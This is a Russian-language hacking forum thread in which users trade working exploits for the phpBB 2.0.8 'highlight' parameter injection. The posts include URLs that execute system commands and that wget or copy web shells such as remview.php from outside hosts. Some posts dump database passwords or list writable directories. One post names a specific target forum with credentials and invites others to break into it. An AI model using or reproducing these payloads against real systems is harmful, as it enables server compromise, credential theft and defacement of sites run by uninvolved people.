Вопрос про заливку шелла в Powered by phpBB 2.0.8 © 2001 phpBB Group
 

Люди, подскажите плизз.... буду очень признателен:

вот когда я хочу скатать шелл на сервер, используя:


http://имя хоста/modules.php?name=Forums/viewtopic.php?t=44=http://123.123.123.123/remview.php%00&t=1&highlight=%2527.include($_GET[44]).%2527


мне в ответ пишет:

he html tags you attempted to use are not allowed

[ Go Back ]

Как можно обойти эту защиту??? форум Powered by phpBB 2.0.8 © 2001 phpBB Group

можно закачать shell этой командой:
viewtopic.php?p=1&highlight=%2527.$poster=%60$ls%6 0.%2527&ls=wget%20http://badsite/shell.php

или:
viewtopic.php?p=3906&highlight=%2527.$poster=`wget %09http://badsite/shell.php`.%2527

может такая заморочка быть, типа привилегий нет чтобы файл создавать, ну тогда ищи папки доступные для записи =)

Onyx3, а почему ...t=44=... это бред! в твоём случае надо писать без t= !

а у меня вообще пишет что такой темы нет :confused:

Люди, ведь форум находится в : http://имяхоста/modules.php?name=Forums

И не одна из этих комманд чтобы залить шелл не действует!!!
Пишет либо - модуль не активен, либо ошибку Денвера!!!


Как можно обойти эту защиту??? форум Powered by phpBB 2.0.8 © 2001 phpBB Group

поробуй выполнить команды так:

а возможно ли записать открытую на запись, которая находиться на сервере не в папке "форум"

и еще, ну узнал, я какая папка доступна на запись (даже в папке форум), что в запрос надо написать ?

viewtopic.php?a=http://123.123.123.123/remview.php&b=../../db/rem.php&t=4&highlight=%2527%252ecopy($_GET[a],$_GET[b])%252e%2527 ???????

типо этого? b=../../db/
а что вместо точек писать? полный путь? где находиться папка?
в таком случае как именно?
что брать за корневой католог?
forum/db/
или полный путь
/usr/home/public_html/forum


не понятно всё это...

P.S.
ведь drwxrwxrwx - это открытая папка на запись.

да не геморься ты, лучше залей обычным wget'ом и потом скопируй...

мне в ответ пишет:

The html tags you attempted to use are not allowed

[ Go Back ]

Как можно обойти эту защиту??? форум Powered by phpBB 2.0.8 © 2001 phpBB Group

Эй ну что кто нибудь встречал такую проблему??

Эй народ по активнее, по активне

вот форум версии 2.0.8
http://lipetsk.ru/town/forum2/
сам я профан во всем этом
но был рад если его ломанули

pass: pinochet
user: www2

ответ на мой пост?

эээ может кому полезно будет =)
http://forum.serverroom.us/remview.php

Какие вы можете предложить варианты взлома форму 2.08 , Union не проходит, может ещё какие нибудь есть??? И ещё как можно посматреть папки которые открыты для записи???(прошу написать комманду)

Народ киньте ссылку где можно скачать remview.php

Free download from http://php.spb.ru/remview/

Плиззз... напишите какими прогами можно подменять Cookie??? если не сложно то напишите ссылочку...

CookieEditor
http://antichat.ru/txt/old/progs.shtml

А как посматреть какие папки открыты на запись???

помогите плиззззз

Народ какой коммандой можно посматреть какие папки открыты на запись???

Дорогие друзья.
Вы хоть раз видели сервер чтоб там было разрешено
`ls` т.е. safe mode?
Я не.
Так что (как у меня в старом видео) - %2527.system($_GET[cmd]).include%2527
INCLUDE нужно для того чтобы кусочек #b( ... убрать из system.

find / -perm -2 -ls

Смотреть папки, открытые на запись (сервер unix):
ls -la
просто ls - только список, ls -1 - вертикальный

А если сервер стоит на винде Хр, то эта комманда не изменится???

дык kez написал команды для никсов,а ты про винду!на винде cmd!

Ну вот я так и думал.... а для винды как можно посматреть???

У себя на тачке:
выполнить cmd
в коммандной help

Люди, Я непрошу взломать то или это. Мне нужна статья или какоенибудь пояснение как использовать команды как wget ls -la и т.д. в вэб интерфейсе. Хочу разобраться. Цель заливка remview.php. И есть ли сейчас перспектива в дэфейсе такого плана? Заранее благадарен

wget - заливка файла на сайт
ls - просмотр файлов в папке
ls -la - полный просмотр с правами доступа))
перемещение по каталогам, команда: cd
cd .. - перемещение на каталог выше
wget http://hompaga.ru/remview.php - зальёт тебе remview.php на сайт..

Можно на примере
http://[Target]/forum/index.php?showtopic=[№]?
Это пример IPB форума ну и остальные аналогично...
Как я понял, что опирирование идёт по средствам адресной строки браузера и всё?

&highlight=%2527.$poster=`pwd`.%2527 Это как я понял выдаёт дирикторию
Далее это параметры мускула так?
&highlight=%2527.$poster=`bdname`.%2527
&highlight=%2527.$poster=`bdpass`.%2527
Просмотр попок для записи
&highlight=%2527.$poster=`&cmd`.%2527&cmd=cd ..;ls -l

Короче поправте если что то накарябал нетак... =\

Во! Нашёл :) http://forum.antichat.ru/showthread.php?t=5076

ЕЕЕЕЕЕЕЕЕЕЕ Я щас убью когото.
Последний раз говорю.
Если ктокто придумал такой сплойт это не значит что он работает!
`ls` не разрешено если не safe mode.
Вот так можно
viewtopic.php?command=uname -a;ls -la&t=10&highlight=%2527.system($_GET[command]).include%2527
ЕЩЁ РАЗ. В конце остается кусок )b# типа того. Он идет в system() т.к. там без скобок.
Поэтому я его сую в ф-ию которая НИЧЕ не возвращает!

Вообщем уже много людей хотят со мной пообщаться по поводу include в конце. Стучите в асю. И все считают что я не то написал. И потом вылезает ошибка Cannot include ")b#"
Все правильно!
Если надо узнать пароль\логин к базе
http://.../viewtopic.php?t=10&highlight=%2527.$poster=$dbpass wd.%2527

Ок! Спасибо братуха :) Разобрался!

Пожалуста... надо в новостях это подправить ))